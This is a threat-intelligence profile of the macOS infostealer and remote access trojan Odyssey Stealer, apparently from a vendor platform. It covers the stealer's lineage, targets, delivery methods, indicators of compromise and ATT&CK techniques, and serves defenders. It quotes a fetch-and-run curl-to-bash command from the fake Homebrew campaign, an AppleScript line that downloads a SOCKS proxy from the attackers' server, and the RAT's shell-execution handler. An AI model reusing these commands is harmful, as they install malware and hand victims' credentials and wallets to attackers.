Odyssey Stealer
Odyssey Stealer is a macOS-focused information stealer and remote access trojan operated as a Malware-as-a-Service platform with an affiliate-based model. Multiple sources in the provided content describe it as a rebrand of Poseidon Stealer and a successor to Poseidon, with Poseidon itself derived from Atomic macOS Stealer (AMOS). It has been observed targeting macOS users worldwide, with reporting noting activity across North America, Latin America, Europe, Asia, and Africa.
Its theft capabilities include credentials, cookies, and browser data from Chrome, Firefox, Safari, Chromium-based browsers, and Gecko-based browsers; macOS Keychain data; Apple Notes; Telegram Desktop data; personal files; and cryptocurrency wallet data. The content states it targets more than 100 browser wallet extensions, specifically 203 browser wallet extensions in one analysis, as well as numerous desktop wallet applications including MetaMask, Phantom, Electrum, Ledger Live, Trezor Suite, Exodus, Atomic, Bitcoin Core, Monero, Wasabi, and Sparrow. Stolen data is compressed and exfiltrated, including in ZIP format.
Beyond infostealing, Odyssey functions as a full RAT. Reported capabilities include arbitrary shell execution, reinfection, SOCKS5 proxy enablement, uninstall support, and persistent command polling every 60 seconds via a LaunchDaemon. The malware can display a fake macOS password prompt, validate the password with dscl . authonly, use the stolen password to access Keychain-derived secrets, install persistence, and replace legitimate Ledger and Trezor applications with trojanized versions designed to intercept credentials and transactions.
Observed delivery vectors in the content include obfuscated AppleScript payloads, fake CAPTCHA and ClickFix-style social engineering, fake Homebrew installer pages, spoofed software portals, seemingly legitimate software updates, cracked tools, fraudulent apps, and campaigns abusing legitimate ChatGPT share links and Google ads. The content also notes use in broader ClickFix ecosystems and in campaigns targeting macOS developers.
Infrastructure reporting in the content ties Odyssey to centrally hosted MaaS/C2 infrastructure and an affiliate panel. Censys-based tracking identified 10 physical hosts associated with its MaaS and C2 infrastructure. Reported indicators include domains such as something0x[.]at, charge0x[.]at, and sdojifsfiudgigfiv[.]to; IPs 62.60.131[.]230, 62.60.131[.]250, 5.199.166[.]102, 77.90.185[.]24, 185.11.61[.]84, 217.119.139[.]117, 185.93.89[.]62, 185.93.89[.]63, 45.146.130[.]129, and 213.209.159[.]175; and a shared SOCKS proxy binary SHA256 d254125912d9e9e5c271766bc4f6eea0c296ad2c0cf19d4bd57081d1bf10f044. Additional reported infrastructure and IOCs include 45.146.130.131 used for exfiltration and second-stage activity, and the command curl -s http://185[.]93[.]89[.]62/d/vipx69930 | nohup bash & observed in fake Homebrew delivery.
The content associates Odyssey/Poseidon lineage with a developer known as Rodrigo4 on the Russian-language XSS forum and notes indicators consistent with Russian-speaking developers or operators, including Russian-language forum activity and dashboard translations. However, the provided material supports this as ecosystem/operator context rather than a formal attribution to a named state actor.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Groups observed using it
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Odyssey Stealer is a macOS information stealer designed to steal cryptocurrencies. It operates as a Malware-as-a-Service (MaaS) platform with an affiliate-based model... Beyond credential theft, Odyssey operates as a full remote access trojan.
Techniques & procedures
26 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development
1 techniqueAffiliates pay for panel access, run their own social engineering campaigns (phishing, malvertising, fake download sites)
Initial Access
3 techniques"Odyssey Stealer ... has been deployed via seemingly legitimate software updates, cracked tools, and fraudulent apps"
When a user clicks one of these malicious search ads, they go to a legitimate URL that looks exactly like a normal chatgpt.com/s/[unique-id] share link.
Iru Threat Intelligence has seen a recent increase in attackers using spoofed Homebrew webpages to get users to download malware.
Execution
5 techniquessupporting arbitrary shell execution ... if command_type is equal to "doshell" then do shell script command_payload
Often delivered via obfuscated AppleScript payloads ... Stage 1: The Initial Dropper The main payload is obfuscated AppleScript wrapped in a shell script.
The main payload is obfuscated AppleScript wrapped in a shell script ... do shell script command_payload
A social engineering technique called ClickFix has resurfaced with significant force, tricking users on both Windows and macOS into manually executing malicious commands that quietly install malware on their devices.
This technique closely mirrors recent “ClickFix” social-engineering campaigns, where victims are coerced into pasting attacker-supplied shell commands... The result is a compact and effective initial infection vector.
Stealth
4 techniques"Aside from continuously modifying its code structure to evade standard blocklists"
The attackers render a custom HTML layout directly on the legitimate domain to display a fake system maintenance message like "we're experiencing high traffic right now," to simulate a crash, and try to get you to download their desktop app.
All five clusters rely on a living-off-the-land (LotL) approach, using trusted system tools already present on the operating system to carry out the attack. By routing execution through native utilities like PowerShell or the macOS Terminal, attackers effectively operate outside the reach of most standard browser-based security defenses.
Credential Access
6 techniquesA fake dialog tricks the user into entering their macOS password ... The password is validated against the system using dscl . authonly
On macOS, this exact trap drops Odyssey Stealer to steal sensitive data.
Browser Data (Chromium-based): Chrome, Brave, Edge, Vivaldi, Opera, OperaGX, Arc, CocCoc Cookies ... Browser Data (Gecko-based): Firefox, Waterfox cookies.sqlite
The password is validated against the system using dscl . authonly and then used for: Extracting Chrome’s master password from Keychain ... Keychain – Full Keychain database (login.keychain-db)
"...to compromise browser-stored information and the macOS Keychain"
"...to compromise browser-stored information and the macOS Keychain"
Discovery
1 techniqueCollection
3 techniquesA fake dialog tricks the user into entering their macOS password ... The password is validated against the system using dscl . authonly
Rather than allowing users to highlight and copy the install command, the page forces them to use a single Copy button. That restriction is purposeful: it enables the attacker to inject an extra hidden command into the clipboard, outside of what is shown to the user on the webpage, which downloads a malicious payload in parallel with the Homebrew installer.
Collect data ... Exfiltrate ZIP: Data is zipped and sent to the C2 via POST to /log
Command and Control
3 techniquessupporting arbitrary shell execution, reinfection, and a SOCKS5 proxy for tunneling traffic through victim machines ... enablesocks5 Downloads and runs SOCKS5 proxy
do shell script "curl -o /tmp/socks " & c2_host & "/otherassets/socks" ... Trojanized asset distribution (/otherassets/)
Beyond credential theft, Odyssey operates as a full remote access trojan.
Exfiltration
1 techniqueExfiltrate ZIP: Data is zipped and sent to the C2 via POST to /log ... Data Exfiltration POST /log
Other
1 techniqueIOCs tracked for this family
73 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
Recent activity
21 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
An infostealer delivered via fake ChatGPT desktop app download pages in the LLMShare campaign; it targets macOS users and steals sensitive data.
Information-stealing malware observed being downloaded by the spoofed Homebrew infrastructure as part of the campaign.
Information-stealing malware deployed via ClickFix campaigns, associated with credential theft and cryptocurrency wallet data harvesting.
A malware family referenced as a secondary payload delivered through ClickFix activity.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.